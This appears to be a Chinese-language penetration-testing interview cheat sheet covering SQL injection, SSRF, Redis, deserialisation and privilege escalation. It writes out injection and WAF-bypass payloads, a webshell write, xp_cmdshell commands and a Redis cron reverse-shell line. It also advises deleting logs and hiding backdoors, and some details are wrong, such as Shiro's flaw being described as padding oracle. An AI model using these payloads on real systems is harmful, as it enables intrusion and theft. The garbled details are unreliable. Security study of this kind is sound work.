网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
一、SQL注入过滤单引号绕过方法
二、MySQL报错注入常用函数
三、报错注入绕WAF
四、MySQL写文件函数
五、MySQL提权方式
六、SQL Server其他渗透方式
七、SSRF原理与利用
八、内网IP过滤绕过
九、Redis漏洞利用
十、文件读取与路径获取
十一、反序列化漏洞
十二、渗透测试流程
十三、CMS指纹特征(以WordPress为例)
十四、正向代理与反向代理区别
十五、常见端口与服务
十六、弱密码绕过验证码
十七、非对称加密过程(RSA)
SQL注入过滤单引号怎么绕过 mysql报错注入常用函数 报错注入绕WAF mysql写文件函数 into outfile使用有哪些限制 mysql提权 SQL server除了SQL注入以外还有哪些渗透方式 SSRF原理 SSRF可以利用的协议 哪些功能点会存在SSRF漏洞 对内网IP进行过滤,有什么绕过方式 redis rce过程 redis未授权怎么获得服务器权限 redis主从复制漏洞 任意文件读取一般读取哪些文件 如何通过文件读取获得web的绝对路径 /ect/passwd 文件包含哪些内容 java 反序列化漏洞 shiro反序列化漏洞 哪些组件或者中间件存在反序列化漏洞 渗透测试一个站点的具体流程 说一个熟悉的CMS,具有哪些指纹特征 正向代理和反向代理的区别 常见端口对应服务 常见的内置用户 弱密码存在验证码如何绕过 非对称加密的加密过程
一、SQL注入过滤单引号绕过方法
- 双写单引号:
'
转为''
,可能被过滤,但部分场景可尝试' OR 1=1--
。- Hex编码:将字符串转为16进制,如
SELECT * FROM users WHERE username=0x61646D696E
。- 宽字节注入:针对GBK编码数据库,利用
%df%27
触发编码错误(%df
与反斜杠\
结合生成繁体字符)。- CHAR()函数:用
CHAR(39)
代替单引号(如SELECT CHAR(97,100,109,105,110)
对应admin
)。- 字符串拼接:如
CONCAT('a','dmin')
拼接为admin
。
二、MySQL报错注入常用函数
- updatexml():sql
触发XPath语法错误,返回查询结果。
AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
- extractvalue():
sql
类似AND extractvalue(1,concat(0x7e,(SELECT database())))
updatexml
,利用XML解析报错。- floor()+rand():
sql
利用主键重复报错。SELECT COUNT(*) FROM users GROUP BY concat(database(),floor(rand(0)*2))
- exp():sql
数值过大导致溢出报错。
AND exp(~(SELECT * FROM(SELECT user())a))
三、报错注入绕WAF
- 分块传输:通过HTTP分块编码绕过正则检测。
- 注释干扰:
sql
/*!50000updatexml*/(1,concat(0x7e,user()),1)
- 大小写混合:如
UpDaTeXmL()
。- 特殊符号分割:
sql
updatexml(1,concat(0x7e,user()%23),1)
- 编码混淆:使用URL编码、Unicode编码(如
%u0027
代替单引号)。
四、MySQL写文件函数
into outfile
:写入多行数据,需绝对路径和权限。sql
SELECT '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/shell.php'
dumpfile
:写入二进制文件(如SSH密钥)。限制:
secure_file_priv
需为空或目标目录。- Web目录需可写且路径正确。
五、MySQL提权方式
- UDF提权:
- 上传自定义动态库(如
lib_mysqludf_sys.so
)。- 创建函数执行系统命令:
sql
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so'
- 启动项提权:
sql
SELECT '恶意命令' INTO OUTFILE '/etc/rc.local'
- CVE漏洞利用:如CVE-2016-6662(权限配置不当)。
六、SQL Server其他渗透方式
- xp_cmdshell:启用后执行系统命令。
sql
EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
- SSRS漏洞:利用Reporting Services的文件上传漏洞。
- 数据库链接攻击:通过
OPENROWSET
跨数据库查询。
七、SSRF原理与利用
- 原理:服务器端发起未验证的网络请求(如读取本地文件或访问内网)。
- 协议利用:
file://
读取本地文件(如file:///etc/passwd
)。gopher://
构造任意TCP流量(攻击Redis/MySQL)。dict://
探测端口信息。- 高危功能点:
- 在线翻译、网页截图、URL预览、XML解析(XXE)等。
八、内网IP过滤绕过
- 进制转换:
127.0.0.1
转为2130706433
(十进制)或0177.0.0.1
(八进制)。- 域名重定向:使用短域名服务或
xip.io
(如127.0.0.1.xip.io
)。- CIDR绕过:
127.127.127.127/8
。
九、Redis漏洞利用
- 未授权访问RCE:
- 写入SSH密钥:
redis
config set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3N...\n\n" save
- 定时任务提权:
redis
set x "\n* * * * * bash -i >& /dev/tcp/ip/port 0>&1\n" config set dir /var/spool/cron config set dbfilename root save
- 主从复制漏洞:加载恶意模块执行命令。
十、文件读取与路径获取
- 敏感文件:
/etc/passwd
:用户列表。/proc/self/environ
:环境变量(可能含路径)。- 日志文件(如
/var/log/apache2/access.log
)。- 路径获取:
- 从PHP错误日志或
phpinfo()
中查找绝对路径。- 配置文件(如
config.php
中的__DIR__
)。
十一、反序列化漏洞
- Java反序列化:Apache Commons Collections的
InvokerTransformer
链触发RCE。- Shiro漏洞:硬编码AES密钥导致Cookie伪造(Padding Oracle攻击)。
- 常见漏洞组件:
- WebLogic(CVE-2020-14882)。
- Fastjson(自动类型推断导致的RCE)。
十二、渗透测试流程
- 信息收集:子域名、端口扫描、CMS指纹识别(如Wappalyzer)。
- 漏洞扫描:Nessus、AWVS检测SQL注入/XSS/SSRF。
- 漏洞利用:Metasploit框架、手工验证。
- 权限提升:Linux脏牛漏洞、Windows MS14-058。
- 痕迹清理:删除日志、隐藏后门。
十三、CMS指纹特征(以WordPress为例)
- 目录结构:
/wp-content/plugins/
、/wp-admin/
。- HTTP头:
X-Powered-By: WordPress
。- 默认文件:
readme.html
、wp-login.php
。
十四、正向代理与反向代理区别
正向代理 反向代理 代理客户端(隐藏客户端IP) 代理服务端(隐藏服务器IP) 用于突破访问限制(如VPN) 用于负载均衡(如Nginx)
十五、常见端口与服务
端口 服务 协议 22 SSH TCP 80 HTTP TCP 443 HTTPS TCP 3306 MySQL TCP 6379 Redis TCP
十六、弱密码绕过验证码
- OCR识别:Tesseract识别简单验证码。
- 验证码复用:同一会话重复提交。
- Burp暴力破解:设置Intruder模块跳过验证码参数。
十七、非对称加密过程(RSA)
- 密钥生成:生成公钥(公开)和私钥(保密)。
- 加密:用公钥加密明文(如
c = m^e mod n
)。- 解密:用私钥解密密文(如
m = c^d mod n
)。- 应用场景:HTTPS握手、SSH登录。